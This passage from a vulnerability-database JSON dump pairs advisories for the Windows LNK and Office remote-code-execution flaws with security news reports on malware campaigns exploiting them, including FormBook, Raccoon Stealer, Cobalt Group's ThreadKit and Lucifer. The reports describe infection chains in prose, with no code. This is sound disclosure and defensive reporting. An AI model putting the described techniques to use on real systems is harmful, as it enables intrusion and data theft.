An attacker exploiting this vulnerability could achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft LNK Remote Code Execution (CVE-2017-8464; CVE-2018-0978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2018-0978"], "modified": "2022-11-14T00:00:00", "id": "CPAI-2017-0477", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user.\n\nTo exploit the vulnerability, a user must open a specially crafted file with an affected version of Microsoft Office software. 
In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office handles files in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8570", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.\n\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe attacker could present to the user a removable drive, or remote share, that contains a malicious .LNK file and an associated malicious binary. When the user opens this drive (or remote share) in Windows Explorer, or any other application that parses the .LNK file, the malicious binary will execute code of the attacker\u2019s choice, on the target system.\n\nThe security update addresses the vulnerability by correcting the processing of shortcut LNK references.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "LNK Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8464", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-09T11:33:23", "description": "Criminals behind malware dubbed Raccoon Stealer have adopted a simple and effective technique to circumvent Microsoft and Symantec anti-spam messaging gateways. The technique has been used in a recent campaign targeting financial institutions via business email compromise (BEC) attacks.\n\nAccording to a [Cofense report posted Thursday](<https://cofense.com/raccoon-stealer-found-rummaging-past-symantec-microsoft-gateways/>), the malware is delivered inside an .IMG file hosted on a hacker-controlled Dropbox account.\n\n\u201cUsing the familiar theme of a wire transfer\u2014closely akin to those often seen in business email compromise scams\u2014the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file,\u201d wrote Cofense authors Max Gannon and Alan Rainer.\n\nWhat makes the Raccoon Stealer interesting to researchers is that it is new, easy-to-use and under active development by the hackers behind it. Cofense said the malware was first spotted in April of 2019 and since then has been leveraged in several different campaigns.\n\nThe malware is sold on underground forums in both Russian and English and includes around-the-clock customer support, Cofense said.\n\nAccording to research published in October by Cybereason, the malware has infected hundreds of thousands of Windows systems since April. 
Researchers there said developers behind the Raccoon Stealer charge $200 a month for its use.\n\n\u201cIn this most recent campaign, a potentially compromised email account was used to send the email,\u201d researchers at Cofense wrote. Those messages managed to make it past Symantec Email Security and Microsoft EOP gateways \u201cwithout the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.\u201d\n\nBecause of the malware\u2019s flexibility to deliver a variety of payloads, the Raccoon Stealer is gaining traction in underground markets, said researchers.\n\n**Tricky Raccoons**\n\nIn previous campaigns, Cofense researchers said the Raccoon Stealer malware has hidden inside RTF document attachments and targeted the utilities sector. In those campaigns, adversaries behind the attacks attempted to leverage a known Microsoft Office remote code execution vulnerability ([CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>)) that dates back to 2017.\n\n\u201cAlthough not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads,\u201d researchers wrote.\n\nThe Raccoon Stealer malware has also been leveraged by attackers behind the Fallout exploit kit. [Over the summer](<https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf>), researchers at Bitdefender observed malicious online ads being used to deliver Raccoon Stealer to vulnerable systems. Exfiltrated from those endpoints were login credentials, auto-fill information and cookies from the Google Chrome and Mozilla browsers. 
Also stolen were credentials for various crypto wallets.\n\n\u201cGiven the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too much on one infection vector,\u201d Cofense researchers said.\n", "cvss3": {}, "published": "2019-11-22T13:32:10", "type": "threatpost", "title": "Raccoon Stealer Malware Scurries Past Microsoft Messaging Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2019-11-22T13:32:10", "id": "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "href": "https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:17", "description": "A new wave of document attacks targeting inboxes do not require enabling macros in order for adversaries to trigger an infection chain that ultimately delivers FormBook malware.\n\nResearchers at Menlo Security are reporting a wave of attacks that began last month that are targeting financial and information service sectors in the Middle East and United States. 
The method of infection includes a new multi-stage infection technique.\n\nThe company, which released details of the method Monday, said that attacks are adept at evading security solutions such as sandboxes and AV solutions, which fail when there is no malicious content or rogue links in a document to detect.\n\n\u201cThe absence of active code or shellcode in the first stage malicious document, which was sent as an email attachment, is noteworthy because this attack relies on a remotely-hosted malicious object,\u201d said Vinay Pidathala, director of security research at Menlo Security.\n\nResearchers said attackers are exploiting \u201cdesign flaws\u201d in the document formats .docx and RTF, in combination with abusing unpatched instances of a remote code execution vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>) [\u2013 patched in July 2017](<https://threatpost.com/microsoft-patch-tuesday-update-fixes-19-critical-vulnerabilities/126758/>).\n\nThe first stage of the attack is the most significant and unique aspect of the malware infection chain, according to researchers. It involves a spam email and an attached .docx file. The Word document utilizes Framesets. \u201cFramesets are HTML tags and contain frames responsible for loading documents,\u201d described the researcher.\n\nWhen the document is simply viewed in Microsoft Office \u201cEdit\u201d mode (and not the default \u201cProtected\u201d mode), an embedded frame points to a TinyURL defined in the document\u2019s webSettings.xml.rels file. 
A \u201c.rels\u201d file contains information about how different parts of a Microsoft Office document fit together, according to a [description on File.org](<https://file.org/extension/rels>).\n\n\u201cIf a victim opens the malicious first stage document, Microsoft Word makes an HTTP request to download the object pointed to by the URL and renders it within the document,\u201d according to Menlo Security.\n\nIn the case of the rogue document, the TinyURL points to command-and-control (C2) server domains located in France and the United States that download a malicious RTF file.\n\nAccording to Pidathala, it is this first stage of the attack that is unique. The rest of the attack, he said, is fairly common and one currently used in a number of recent attacks by cybercriminals behind the Cobalt group to deliver FormBook and other types of malware.\n\n\u201cA design behavior occurs in RTF documents, when an RTF document with an embedded Package object is opened, the embedded object is automatically dropped to the %TEMP% directory of Windows. This technique was also used by the threat actors behind the Cobalt group that used [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>),\u201d wrote researchers noting a recent spike in attacks [using the CVE](<https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware>).\n\nThe vulnerability CVE-2017-11882 is the remote code execution bug patched last November located in an Office executable called Microsoft Equation Editor. 
But instead of taking advantage of that vulnerability, the most recent attacks identified by Menlo Security take advantage of the vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>).\n\nThe vulnerability CVE-2017-8570 is a remote code execution vulnerability in Microsoft Office tied to the way the software suite handles objects in memory.\n\n\u201cFor the attack to succeed, this executable still needs to be executed. And, that\u2019s where the CVE-2017-8570 comes into play. CVE-2017-8570 executes the dropped object in the %TEMP% directory,\u201d researchers said.\n\nMenlo Security observed an embedded .sct (scriptlet) file dropped to the %TEMP% directory. \u201cWhen the .sct file is executed, the large amount of data is written to the %TEMP% directory with the name chris101.exe. Wscript.Shell.Run() method is then called with the path to the .exe to start the malicious executable,\u201d they said.\n\nNext, the malicious executable calls to the adversaries\u2019 C2 and downloads a third-stage downloader that drops the FormBook malware onto the targeted system.\n\nFormBook is a type of data-stealing malware used in espionage and is capable of keystroke logging, stealing clipboard contents and extracting data from HTTP sessions. Once installed, the malware can also execute commands from a command-and-control (C2) server such as instructing the malware to download more files, start processes, shutdown and reboot a system and steal cookies and local passwords.\n\nPidathala said he believes this attack technique exposes a larger attack surface. 
\u201cThere will be an uptick in malicious objects, where the malicious components are remotely hosted,\u201d he said.\n", "cvss3": {}, "published": "2018-04-09T18:35:39", "type": "threatpost", "title": "Word Attachment Delivers FormBook Malware, No Macros Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2018-04-09T18:35:39", "id": "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "href": "https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group first burst onto the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. 
Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. 
This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite the arrest earlier this year of a key member, the Cobalt Group remains active.\n * A new version of the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses an XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. 
In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. 
As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing an RTF Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into its own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan CobInt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, an XOR routine used to decode the initial CobInt payload. An XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. 
So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrests of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:32", "description": "Microsoft\u2019s Patch Tuesday update today included a massive 95 fixes that tackle vulnerabilities in Windows, Office, Skype, Internet Explorer and its Edge browser. Twenty-seven of Microsoft\u2019s patches fix remote code execution issues, allowing attackers to remotely take control of a victim\u2019s PC. 
Eighteen patches are rated critical by Microsoft, 76 important and one is rated moderate.\n\nOf greatest concern are two vulnerabilities currently under attack that include a Windows Search Remote Code Execution Vulnerability ([CVE-2017-8543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8543>)) and a LNK Remote Code Execution Vulnerability ([CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>)).\n\nThe more serious of the two, the Windows Search Remote Code Execution Vulnerability patch, tackles an RCE in the Windows OS found in the Windows Search Service (WSS), a feature in Windows that allows users to search across multiple Windows services and clients.\n\n\u201cIn an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer,\u201d according to the bulletin. Affected are Windows Server 2016, 2012, 2008 as well as desktop systems like Windows 10, 7 and 8.1.\n\nThe second vulnerability actively being exploited is the LNK Remote Code Execution Vulnerability, which allows an RCE if a specially crafted shortcut is displayed to a user. \u201cIf you\u2019re experiencing d\u00e9j\u00e0 vu reading the bug title, it\u2019s certainly understandable. This type of vulnerability was used by the Stuxnet malware, then found again several years later through a ZDI program submission,\u201d according to Patch Tuesday commentary by Zero Day Initiative (ZDI).\n\nThose critical patches were supplemented Tuesday by additional patches released by Microsoft on the same day that address [fixes for unsupported versions of Windows such as Windows XP and Windows Server 2003](<https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/>). 
The fixes are meant to prevent the WannaCry [ransomware outbreak from last month](<https://support.microsoft.com/en-ca/help/4025685/microsoft-security-advisory-4025685-guidance>). The patch follows an [emergency patch released just weeks ago, also for XP](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>). The updates can be found at Microsoft Download Center, but won\u2019t be delivered automatically through Windows Update.\n\nAccording to security experts at Qualys, another high-priority issue for sysadmins should be a Windows Graphics RCE Vulnerability ([CVE-2017-8527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8527>)). This vulnerability is triggered when users view a malicious website with specially crafted fonts. \u201cA remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system,\u201d [Microsoft notes](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8527>).\n\n\u201cOverall it\u2019s a large security update which is almost double as compared to last two months in the number of patched vulnerabilities. 
Actively exploited SMB issue CVE-2017-8543 and other Font, Outlook, Office, Edge and IE issues are sure to keep system administrators and security teams busy,\u201d said Amol Sarwate, director of engineering at Qualys.\n\nSarwate advises organizations using Outlook that they should also prioritize a patch for a Microsoft Office Memory Corruption Vulnerability ([CVE-2017-8507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8507>)), which attackers can exploit by sending a malicious e-mail to a target and take complete control when the recipient views the message in Outlook.\n\nLastly, Microsoft patches Microsoft Edge and IE for several remote code execution issues ([CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>), [CVE-2017-8530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8530>) and [CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>)) that are particularly important as they have been publicly disclosed although no attacks have been observed yet, according to Qualys.\n\nEarlier in the day, [Adobe fixed 21 vulnerabilities across four products](<https://threatpost.com/adobe-fixes-21-critical-vulnerabilities-with-june-patch-tuesday-update/126230/>) \u2013 Flash, Shockwave Player, Captivate, and Adobe Digital Editions.\n", "cvss3": {}, "published": "2017-06-13T16:23:28", "type": "threatpost", "title": "Microsoft Patches Two Critical Vulnerabilities Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8498", "CVE-2017-8507", "CVE-2017-8523", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8543"], "modified": "2017-06-13T20:23:28", "id": "THREATPOST:15B0A575618A05410227B72FFBBC216F", "href": "https://threatpost.com/microsoft-patches-two-critical-vulnerabilities-under-attack/126239/", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on [Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework ([CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable 
device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. 
Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a 